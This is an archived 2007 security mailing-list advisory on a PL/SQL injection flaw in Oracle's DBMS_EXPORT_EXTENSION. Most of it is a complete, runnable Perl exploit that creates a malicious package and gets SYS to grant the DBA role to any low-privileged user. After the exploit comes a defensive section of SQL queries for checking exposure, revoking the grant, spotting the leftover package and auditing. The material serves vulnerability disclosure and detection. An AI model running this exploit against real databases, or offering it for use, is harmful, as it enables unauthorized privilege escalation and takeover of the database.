[EXPL] Oracle DBMS_EXPORT_EXTENSION SQL Injection Vulnerability
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 5 Feb 2007 17:35:57 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Oracle DBMS_EXPORT_EXTENSION SQL Injection Vulnerability
------------------------------------------------------------------------
SUMMARY
Oracle Database is prone to a PL/SQL injection (privilege escalation) flaw in
the SYS-owned package DBMS_EXPORT_EXTENSION, which is executable by PUBLIC on
unpatched installations. Its GET_DOMAIN_INDEX_METADATA function runs with the
definer's (SYS) rights and builds a dynamic PL/SQL block that invokes the
ODCIIndexGetMetadata method of whatever type or package the caller names in
TYPE_SCHEMA/TYPE_NAME. A low-privileged user can therefore supply a package of
their own, declared AUTHID CURRENT_USER, whose ODCIIndexGetMetadata runs
arbitrary DDL as SYS. The exploit below uses this to grant the DBA role to the
connecting user (or to revoke it again); see BID 17699 for affected versions
and patch information.
DETAILS
Exploit:
#!/usr/bin/perl
#
# Remote Oracle dbms_export_extension exploit (any version)
# Grant or revoke dba permission to unprivileged user
#
# Tested on Oracle 10g - Release 10.2.0.1.0
# Oracle 9i - Release 9.2.0.2.0
#
# REF: http://www.securityfocus.com/bid/17699
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Sun Feb 4 15:53:04 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
# How it works: SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA is a
# definer's-rights (SYS) routine that PUBLIC may execute. It builds a PL/SQL
# block calling <TYPE_SCHEMA>.<TYPE_NAME>.ODCIIndexGetMetadata on whatever
# package the caller names, so an AUTHID CURRENT_USER package that we own is
# executed with SYS's privileges.
#
use warnings;
use strict;
use DBI;
use DBD::Oracle;
use Getopt::Std;

my %opt;

sub usage {
    print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> [-g|-r]
Options:
  -h <host>    target server address
  -s <sid>     target sid name
  -u <user>    user
  -p <passwd>  password
  -g|-r        (g)rant dba to user | (r)evoke dba from user
USAGE
    exit 0;
}

my $opt_string = 'h:s:u:p:gr';
getopts( $opt_string, \%opt ) or usage();
# All four connection parameters are required.
usage() unless ( $opt{h} and $opt{s} and $opt{u} and $opt{p} );
usage() if ( !$opt{g} and !$opt{r} );

my $user = uc $opt{u};
my $dbh  = DBI->connect(
    "dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p},
    { RaiseError => 0, PrintError => 0, AutoCommit => 1 }
) or die "[!] Connection failed: $DBI::errstr\n";

# DDL that our package will execute as SYS (-r wins if both flags are given).
my $sqlcmd = $opt{r} ? "REVOKE DBA FROM $user" : "GRANT DBA TO $user";

# Run one statement and fail loudly. CREATE PACKAGE [BODY] succeeds with a
# warning when the unit has compilation errors, so also fetch the USER_ERRORS
# text through DBD::Oracle's plsql_errstr (undef on error, "" when clean).
sub run_plsql {
    my ( $what, $sql ) = @_;
    print "[-] $what\n";
    defined $dbh->do($sql)
        or die "[!] $what failed: " . $dbh->errstr . "\n";
    my $msg = $dbh->func('plsql_errstr');
    die "[!] " . $dbh->errstr . "\n" if not defined $msg;
    die "[!] $what: PL/SQL compilation errors:\n$msg\n" if $msg;
}

# 1. Package spec. AUTHID CURRENT_USER is the key: when SYS's definer's-rights
#    package calls us, the "current user" is SYS, so our body runs as SYS.
run_plsql( 'Declaring package', qq{
CREATE OR REPLACE PACKAGE BUNKERPKG AUTHID CURRENT_USER IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo, P3 VARCHAR2,
                                 p4 VARCHAR2, env SYS.odcienv) RETURN NUMBER;
END;
} );

# 2. Package body: ODCIIndexGetMetadata runs the GRANT/REVOKE. The autonomous
#    transaction lets it COMMIT the DDL independently of the caller's
#    transaction.
run_plsql( 'Building evil package', qq{
CREATE OR REPLACE PACKAGE BODY BUNKERPKG IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo, P3 VARCHAR2,
                                 p4 VARCHAR2, env SYS.odcienv) RETURN NUMBER IS
    pragma autonomous_transaction;
  BEGIN
    EXECUTE IMMEDIATE '$sqlcmd';
    COMMIT;
    RETURN(1);
  END;
END;
} );

# 3. Trigger: ask SYS to fetch "domain index metadata" from our package.
#    INDEX_NAME is a placeholder; TYPE_SCHEMA/TYPE_NAME select the code run.
run_plsql( 'Finishing evil package', qq{
DECLARE
  INDEX_NAME   VARCHAR2(200);
  INDEX_SCHEMA VARCHAR2(200);
  TYPE_NAME    VARCHAR2(200);
  TYPE_SCHEMA  VARCHAR2(200);
  VERSION      VARCHAR2(200);
  NEWBLOCK     PLS_INTEGER;
  GMFLAGS      NUMBER;
  v_Return     VARCHAR2(200);
BEGIN
  INDEX_NAME   := 'A1';
  INDEX_SCHEMA := '$user';
  TYPE_NAME    := 'BUNKERPKG';
  TYPE_SCHEMA  := '$user';
  VERSION      := '';
  GMFLAGS      := 1;
  v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
      INDEX_NAME  => INDEX_NAME,  INDEX_SCHEMA => INDEX_SCHEMA,
      TYPE_NAME   => TYPE_NAME,   TYPE_SCHEMA  => TYPE_SCHEMA,
      VERSION     => VERSION,     NEWBLOCK     => NEWBLOCK,
      GMFLAGS     => GMFLAGS );
END;
} );

print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit 0;
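The checks a DBA would run against a database for the issue above, as an added example: this is not part of the advisory or of the author's tool. It assumes a SYSDBA session on an Oracle 9i/10g instance with the standard audit trail enabled (AUDIT_TRAIL=DB). BUNKERPKG and the ODCIIndexGetMetadata name are the ones the exploit uses; every other object name is illustrative.

```sql
-- 1. Exposure check: who may execute the SYS package the exploit calls?
--    On an unpatched install the grantee is PUBLIC, i.e. every database user.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_EXPORT_EXTENSION';

-- 2. Hardening: apply the Critical Patch Update covering BID 17699. Where no
--    export job or application account needs the package, also remove the
--    PUBLIC grant (verify first: the Oracle export utility uses this package).
REVOKE EXECUTE ON sys.dbms_export_extension FROM PUBLIC;

-- 3. Hunt for attacker artifacts: a schema that defines an ODCIIndexGetMetadata
--    method without being registered as an indextype implementation is the
--    footprint the tool leaves behind (BUNKERPKG in the exploit above).
SELECT DISTINCT s.owner, s.name, s.type
  FROM dba_source s
 WHERE UPPER(s.text) LIKE '%ODCIINDEXGETMETADATA%'
   AND s.owner NOT IN ('SYS', 'SYSTEM')
   AND NOT EXISTS (SELECT 1
                     FROM dba_indextypes i
                    WHERE i.implementation_schema = s.owner
                      AND i.implementation_name   = s.name);

-- 4. Who holds DBA? An unexpected grantee is the immediate symptom of a
--    successful run ("GRANT DBA TO <user>").
SELECT grantee, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role = 'DBA';

-- 5. Detection going forward: audit every call of the package and every
--    GRANT/REVOKE of system privileges and roles, then watch the trail.
AUDIT EXECUTE ON sys.dbms_export_extension BY ACCESS;
AUDIT SYSTEM GRANT BY ACCESS;

SELECT timestamp, username, os_username, userhost, action_name, owner, obj_name
  FROM dba_audit_trail
 WHERE (owner = 'SYS' AND obj_name = 'DBMS_EXPORT_EXTENSION')
    OR action_name IN ('GRANT ROLE', 'REVOKE ROLE')
 ORDER BY timestamp;
```

Query 3 is the most useful hunt: legitimate ODCIIndex implementations (Oracle Text, Spatial, in-house domain indexes) are registered through CREATE INDEXTYPE and therefore appear in DBA_INDEXTYPES, while a package created only to be fed to GET_DOMAIN_INDEX_METADATA is not. Query 5 pairs the EXECUTE audit record on the package with the GRANT ROLE record that follows it, which is the sequence the exploit produces.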
ADDITIONAL INFORMATION
The information has been provided by Andrea "bunker" Purificato
<mailto:bunker@xxxxxxxxxxxxx>.
The original article can be found at:
http://rawlab.mindcreations.com/codes/exp/oracle/dbms_exp_ext.pl
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.